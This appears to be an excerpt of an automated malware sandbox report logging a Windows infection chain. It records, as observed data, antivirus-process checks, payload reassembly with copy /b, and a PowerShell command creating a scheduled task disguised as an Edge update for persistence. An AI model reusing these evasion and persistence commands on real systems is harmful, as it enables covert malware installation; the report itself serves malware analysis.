Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe "C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process created: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{934473F6-3DB5-419B-8D3A-27C77AD9ADC5}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\uxtheme_2.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{934473f6-3db5-419b-8d3a-27c77ad9adc5}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:sync c:\users\user\appdata\roaming\uxtheme_2.drv\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{934473f6-3db5-419b-8d3a-27c77ad9adc5}' -description 'microsoftedgeupdatetaskmachineua' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries -executiontimelimit 0) -runlevel highest"

Source: 78K21CNZITPIMAK88B8Q.exe, 00000004.00000002.2291165885.00000000007CB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2333133952.0000000000E5B000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000006.00000002.2342709895.0000000000E5B000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: o;WRVProgram Manager
Source: Avoiding.com, 00000015.00000000.2628429254.0000000000893000.00000002.00000001.01000000.0000000E.sdmp, Macromedia.com, 0000002C.00000000.2840171044.0000000000DC3000.00000002.00000001.01000000.0000001A.sdmp, Macromedia.com, 0000002C.00000003.2847709115.0000000004173000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe, 00000003.00000002.2260017887.000000000123F000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: Program Manager
Source: 78K21CNZITPIMAK88B8Q.exe, 78K21CNZITPIMAK88B8Q.exe, 00000004.00000002.2291165885.00000000007CB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2333133952.0000000000E5B000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: ;WRVProgram Manager
Source: f35b37b5a5.exe, 00000017.00000002.2713928467.0000000000D87000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: \Program Manager

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062165001\52d42007e3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062165001\52d42007e3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
